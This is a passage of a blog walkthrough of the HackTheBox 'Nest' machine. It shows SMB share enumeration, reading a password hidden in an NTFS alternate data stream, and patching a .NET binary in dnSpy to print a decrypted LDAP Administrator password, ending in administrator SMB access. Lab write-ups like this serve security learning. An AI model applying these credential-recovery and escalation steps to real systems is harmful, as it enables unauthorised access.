        <span class="k">ReDim</span> <span class="n">plainTextBytes</span><span class="p">(</span><span class="n">cipherTextBytes</span><span class="p">.</span><span class="n">Length</span><span class="p">)</span>
        <span class="k">Dim</span> <span class="nv">decryptedByteCount</span> <span class="ow">As</span> <span class="kt">Integer</span>
        <span class="n">decryptedByteCount</span> <span class="o">=</span> <span class="n">cryptoStream</span><span class="p">.</span><span class="n">Read</span><span class="p">(</span><span class="n">plainTextBytes</span><span class="p">,</span> <span class="n">_</span>
                                               <span class="mi">0</span><span class="p">,</span> <span class="n">_</span>
                                               <span class="n">plainTextBytes</span><span class="p">.</span><span class="n">Length</span><span class="p">)</span>
        <span class="n">memoryStream</span><span class="p">.</span><span class="n">Close</span><span class="p">()</span>
        <span class="n">cryptoStream</span><span class="p">.</span><span class="n">Close</span><span class="p">()</span>
        <span class="k">Dim</span> <span class="nv">plainText</span> <span class="ow">As</span> <span class="kt">String</span>
        <span class="n">plainText</span> <span class="o">=</span> <span class="n">Encoding</span><span class="p">.</span><span class="n">ASCII</span><span class="p">.</span><span class="n">GetString</span><span class="p">(</span><span class="n">plainTextBytes</span><span class="p">,</span> <span class="n">_</span>
                                            <span class="mi">0</span><span class="p">,</span> <span class="n">_</span>
                                            <span class="n">decryptedByteCount</span><span class="p">)</span>
	<span class="n">System</span><span class="p">.</span><span class="n">Console</span><span class="p">.</span><span class="n">WriteLine</span><span class="p">(</span><span class="n">plainText</span><span class="p">)</span> <span class="o">//</span> <span class="n">add</span> <span class="n">this</span> <span class="n">line</span>
	<span class="k">Return</span> <span class="n">plainText</span>
    <span class="k">End</span> <span class="k">Function</span>

<span class="k">Public</span> <span class="k">Class</span> <span class="nc">SsoIntegration</span>
    <span class="k">Public</span> <span class="k">Property</span> <span class="nf">Username</span> <span class="ow">As</span> <span class="kt">String</span>
    <span class="k">Public</span> <span class="k">Property</span> <span class="nf">Password</span> <span class="ow">As</span> <span class="kt">String</span>
<span class="k">End</span> <span class="k">Class</span>
    
    <span class="k">Sub</span> <span class="nf">Main</span><span class="p">()</span>
		<span class="k">Dim</span> <span class="nv">test</span> <span class="ow">As</span> <span class="k">New</span> <span class="n">SsoIntegration</span> <span class="k">With</span> <span class="p">{.</span><span class="n">Username</span> <span class="o">=</span> <span class="s">"c.smith"</span><span class="p">,</span> <span class="p">.</span><span class="n">Password</span> <span class="o">=</span> <span class="n">Utils</span><span class="p">.</span><span class="n">DecryptString</span><span class="p">(</span><span class="s">"fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE="</span><span class="p">)}</span>
    <span class="k">End</span> <span class="k">Sub</span>
<span class="k">End</span> <span class="k">Class</span>
</pre></table></code></div></div><p>the password can be used to login to C.smith</p><h1 id="smb-enumeration-as-c-smith">smb enumeration as c smith</h1><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
</pre><td class="rouge-code"><pre>smb: \&gt; recurse on
smb: \&gt; ls
  .                                  D        0  Sat Jan 25 18:04:21 2020
  ..                                 D        0  Sat Jan 25 18:04:21 2020
  Administrator                      D        0  Fri Aug  9 11:08:23 2019
  C.Smith                            D        0  Sun Jan 26 02:21:44 2020
  L.Frost                            D        0  Thu Aug  8 13:03:01 2019
  R.Thompson                         D        0  Thu Aug  8 13:02:50 2019
  TempUser                           D        0  Wed Aug  7 18:55:56 2019

\Administrator
NT_STATUS_ACCESS_DENIED listing \Administrator\*

\C.Smith
  .                                  D        0  Sun Jan 26 02:21:44 2020
  ..                                 D        0  Sun Jan 26 02:21:44 2020
  HQK Reporting                      D        0  Thu Aug  8 19:06:17 2019
  user.txt                           A      32  Thu Aug  8 19:05:24 2019

\L.Frost
NT_STATUS_ACCESS_DENIED listing \L.Frost\*

\R.Thompson
NT_STATUS_ACCESS_DENIED listing \R.Thompson\*

\TempUser
NT_STATUS_ACCESS_DENIED listing \TempUser\*

\C.Smith\HQK Reporting
  .                                  D        0  Thu Aug  8 19:06:17 2019
  ..                                 D        0  Thu Aug  8 19:06:17 2019
  AD Integration Module              D        0  Fri Aug  9 08:18:42 2019
  Debug Mode Password.txt            A        0  Thu Aug  8 19:08:17 2019
  HQK_Config_Backup.xml              A      249  Thu Aug  8 19:09:05 2019

\C.Smith\HQK Reporting\AD Integration Module
  .                                  D        0  Fri Aug  9 08:18:42 2019
  ..                                 D        0  Fri Aug  9 08:18:42 2019
  HqkLdap.exe                        A    17408  Wed Aug  7 19:41:16 2019
smb: \&gt;
</pre></table></code></div></div><h2 id="getting-usertxt">getting user.txt</h2><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre><td class="rouge-code"><pre>kali@kali:~/htb/nest<span class="nv">$ </span>smbclient  <span class="se">\\\\</span>10.10.10.178<span class="se">\\</span>Users <span class="nt">-U</span> C.Smith
Enter WORKGROUP<span class="se">\C</span>.Smith<span class="s1">'s password:
Try "help" to get a list of possible commands.
smb: \&gt; cd C.Smith\
smb: \C.Smith\&gt; get user.txt
getting file \C.Smith\user.txt of size 32 as user.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \C.Smith\&gt;
</span></pre></table></code></div></div><h1 id="privilege-escalation">privilege escalation</h1><p>there’s a file named Debug Mode Password the file has no data in it but if you run</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre><td class="rouge-code"><pre>smb: \C.Smith\HQK Reporting\&gt; allinfo "Debug Mode Password.txt"
 altname: DEBUGM-1.TXT 
 create_time:  Thu Aug 8 07:06:12 PM 2019 EDT 
 access_time:  Thu Aug 8 07:06:12 PM 2019 EDT 
 write_time:   Thu Aug 8 07:08:17 PM 2019 EDT 
 change_time:  Thu Aug 8 07:08:17 PM 2019 EDT 
 attributes: A (20)
 stream: [::$DATA], 0 bytes 
 stream: [:Password:$DATA], 15 bytes 
</pre></table></code></div></div><p>there is a password stream hear is how you read it <img src= /assets/img/commons/loading.png data-src="https://i.ibb.co/5vCVw2s/Untitled.png" alt="get password stream" /></p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre>kali@kali:~/htb/nest<span class="nv">$ </span><span class="nb">cat </span>Debug<span class="se">\ </span>Mode<span class="se">\ </span>Password.txt<span class="se">\:\$</span>Data
<span class="o">{</span>redacted<span class="o">}</span>
</pre></table></code></div></div><p>this password can be used to get access to debug mode debug gives you access to showquery</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
</pre><td class="rouge-code"><pre>kali@kali:~/htb/nest$ telnet 10.10.10.178 4386                                                                                                                               
Trying 10.10.10.178...                                                                                                                                                                     
Connected to 10.10.10.178.                                                                                                                                                                 
Escape character is '^]'.                                                                                                                                                                 
                                                                                                                                                                                           
HQK Reporting Service V1.2                                                                                                                                                                 
                                                                                                                                                                                           
&gt;debug WBQ201953D8w                                                                                                                                                                       
                                                                                                                                                                                           
Debug mode enabled. Use the HELP command to view additional commands that are now available                                                                                               
&gt;list                                                                                                                                                                                     
                                                                                                                                                                                           
Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command                                                                                   
                                                                                                                                                                                           
QUERY FILES IN CURRENT DIRECTORY                                                                                                                                                         
                                                                                                                                                                                           
[DIR]  COMPARISONS
[1]  Invoices (Ordered By Customer)
[2]  Products Sold (Ordered By Customer)
[3]  Products Sold In Last 30 Days

Current Directory: ALL QUERIES
&gt;setdir ..

Current directory set to HQK
&gt;list 

Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

QUERY FILES IN CURRENT DIRECTORY

[DIR]  ALL QUERIES
[DIR]  LDAP
[DIR]  Logs
[1]  HqkSvc.exe
[2]  HqkSvc.InstallState
[3]  HQK_Config.xml

Current Directory: HQK
&gt;setdir LDAP   

Current directory set to LDAP
&gt;list

Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

QUERY FILES IN CURRENT DIRECTORY

[1]  HqkLdap.exe
[2]  Ldap.conf

Current Directory: LDAP
&gt;showquery 2

Domain=nest.local
Port=389
BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local
User=Administrator
Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=

&gt;
</pre></table></code></div></div><p>the password in Ldap.conf is encrypted HqkLdap.exe decrypts it, you can open HqkLdap.exe in dnspy. when you open the exe file in dnspy go to the MainModule right click and edit method. <img src= /assets/img/commons/loading.png data-src="https://i.ibb.co/Jtn5VMn/Capture.png" alt="dnspy" /> the code won’t run unless hqkDBimport.exe is present the file is not needed so you can delete the check</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
</pre><td class="rouge-code"><pre>try
				{
					if (MyProject.Application.CommandLineArgs.Count != 1)
					{
						Console.WriteLine("Invalid number of command line arguments");
					}
					else if (!File.Exists(MyProject.Application.CommandLineArgs[0]))
					{
						Console.WriteLine("Specified config file does not exist");
					}
					else
					{
						LdapSearchSettings ldapSearchSettings = new LdapSearchSettings();
</pre></table></code></div></div><p>and add <code class="language-plaintext highlighter-rouge">Console.WriteLine(ldap.Password.ToString());</code> above “Performing LDAP query” the mod is done now to export it go to file ‘save all’ lastly run the file in PowerShell</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre>PS C:\Users\MatthewS\OneDrive\Desktop\New folder&gt; .\HqkLdapmod.exe .\Ldap.conf
REDACTED
</pre></table></code></div></div><p>you can use this password to login to smb and get the root flag</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>smbclient  <span class="se">\\\\</span>10.10.10.178<span class="se">\\</span>c<span class="nv">$ </span><span class="nt">-U</span> Administrator
</pre></table></code></div></div></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/categories/hackthebox/'>HackTheBox</a>, <a href='/categories/windows/'>windows</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="/tags/smb/" class="post-tag no-text-decoration" >SMB</a> <a href="/tags/hackthebox/" class="post-tag no-text-decoration" >HackTheBox</a> <a href="/tags/nest/" class="post-tag no-text-decoration" >Nest</a> <a href="/tags/dnspy/" class="post-tag no-text-decoration" >Dnspy</a> <a href="/tags/.net/" class="post-tag no-text-decoration" >.net</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center pt-5 pb-2"><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/">CC BY 4.0</a> by the author.</div><!-- Post sharing snippet v2.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung Published under the MIT License --><div class="share-wrapper"> <span class="share-label text-muted mr-1">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=Hack the box Nest walkthrough - Matthew spina&url=https://matthew-spina.github.io/Blog/posts/Hack-The-Box-Nest/" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=Hack the box Nest walkthrough - Matthew spina&u=https://matthew-spina.github.io/Blog/posts/Hack-The-Box-Nest/" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://telegram.me/share?text=Hack the box Nest walkthrough - Matthew spina&url=https://matthew-spina.github.io/Blog/posts/Hack-The-Box-Nest/" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank"> <i class="fa-fw fab fa-telegram"></i> </a> <i class="fa-fw fas fa-link small" onclick="copyLink()" data-toggle="tooltip" data-placement="top" title="Copy link"></i> </span></div></div></div></div></div><!-- The Pannel on right side (Desktop views) v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted topbar-down"><div class="access"><div id="access-tags"><h3 data-toc-skip>Trending Tags</h3><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/smb/">SMB</a> <a class="post-tag" href="/tags/nest/">Nest</a> <a class="post-tag" href="/tags/hackthebox/">HackTheBox</a> <a class="post-tag" href="/tags/dnspy/">Dnspy</a> <a class="post-tag" href="/tags/.net/">.net</a></div></div></div><div id="toc-wrapper" class="pl-0 pr-4 mb-5"><h3 data-toc-skip class="pl-3 pt-2 mb-3">Contents</h3><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div id="post-extend-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"> <!-- Navigation buttons at the bottom of the post. v2.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --><div class="post-navigation d-flex justify-content-between"> <span class="btn btn-outline-primary disabled"><p>-</p></span> <span class="btn btn-outline-primary disabled"><p>-</p></span></div><!-- The Disqus lazy loading. Powered by: https://osvaldas.info/lazy-loading-disqus-comments v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung MIT License --><div id="disqus" class="pt-2 pb-4"><p class="font-italic text-muted small">Comments powered by <a href="https://disqus.com/">Disqus</a>.</p></div><script src="https://matthew-spina.github.io/Blog/assets/lib/jquery.disqusloader.min.js"></script> <script> var options = { scriptUrl: '//matthewspina-blog.disqus.com/embed.js', disqusConfig: function() { this.page.url = 'https://matthew-spina.github.io/Blog/posts/Hack-The-Box-Nest/'; this.page.identifier = '/posts/Hack-The-Box-Nest/'; } }; $.disqusLoader('#disqus', options); </script> <!-- The related posts of current post. Placed in the bottom of every single post. v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung Published under the MIT License --></div></div></div><script type="text/javascript" src="https://cdn.jsdelivr.net/npm/lozad/dist/lozad.min.js"></script> <script type="text/javascript"> const imgs = document.querySelectorAll('#post-wrapper img'); const observer = lozad(imgs); observer.observe(); </script> <!-- The Footer v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><footer class="d-flex w-100 justify-content-center"><div class="d-flex justify-content-between align-items-center"><div class="footer-left"><p class="mb-0"> © 2020 <a href="https://twitter.com/Matthewspina3">Matthew Spina</a>. <span data-toggle="tooltip" data-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span></p></div><div class="footer-right"><p class="mb-0"> Powered by <a href="https://jekyllrb.com" target="_blank">Jekyll</a> with <a href="https://github.com/cotes2020/jekyll-theme-chirpy/">Chirpy</a> theme.</p></div></div></footer></div><!-- The Search results v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-xl-11 post-content"><div id="search-hints"><h4 class="text-muted mb-4">Trending Tags</h4><a class="post-tag" href="/tags/smb/">SMB</a> <a class="post-tag" href="/tags/nest/">Nest</a> <a class="post-tag" href="/tags/hackthebox/">HackTheBox</a> <a class="post-tag" href="/tags/dnspy/">Dnspy</a> <a class="post-tag" href="/tags/.net/">.net</a></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a> <!-- The GA snippet v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga'); ga('create', '', 'auto'); ga('send', 'pageview'); </script> <!-- Jekyll Simple Search loader v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --> <script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.7.3/dest/simple-jekyll-search.min.js" integrity="sha256-qcLR00zq6pJk4je3MLgAri8Nn+ZumUlXgTKR2H/xCY0=" crossorigin="anonymous"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="https://matthew-spina.github.io/Blog{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"><div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>{categories}</div><div><i class="fa fa-tag fa-fw"></i>{tags}</div></div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No result founds.</p>' }); </script>
